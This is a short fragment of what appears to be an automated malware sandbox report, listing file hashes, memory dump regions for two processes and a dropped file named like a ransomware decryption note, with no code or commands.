| SHA256 | 8a9d0f4893a005f3e9ad3c0dac3bc9d796b009c93ecd0bed049f2310df1760a4 |
| SHA512 | 326071256dd1d37e60471ba32bd7613898bc564e51b6d357a4578b40dce414976537f6e70b9c93a2f9a37415f04af91ef1fdfd4594c2be1ac1b86887244faf46 |
memory/3652-225-0x0000017C433F8000-0x0000017C433F9000-memory.dmp
memory/1112-227-0x0000020CCD333000-0x0000020CCD335000-memory.dmp
memory/1112-226-0x0000020CCD330000-0x0000020CCD332000-memory.dmp
memory/1112-228-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-229-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-230-0x0000020CCDDC0000-0x0000020CCDE36000-memory.dmp
memory/1112-231-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-235-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-236-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-256-0x0000020CCD336000-0x0000020CCD338000-memory.dmp
memory/1112-258-0x0000020CCD338000-0x0000020CCD339000-memory.dmp
C:\4a7Z_HOW_TO_DECRYPT.txt
| MD5 | e8581e1c0975e92f67bf014e1e1adb97 |
| SHA1 | 22b2946186cdfbd125da2de12550df1394b6548e |
| SHA256 | b5a8f263eaf410d0353d41f31c68080dcc3ac5f6272de7970b23f0b47e55cfd6 |
| SHA512 | cc2ec7f112a1629d47687dfb41988404a107ec79644f222121478ce0134e0f6410d6496988e45b681f463ba71d56666afc2355f92a10501e9c094bc4665085ae |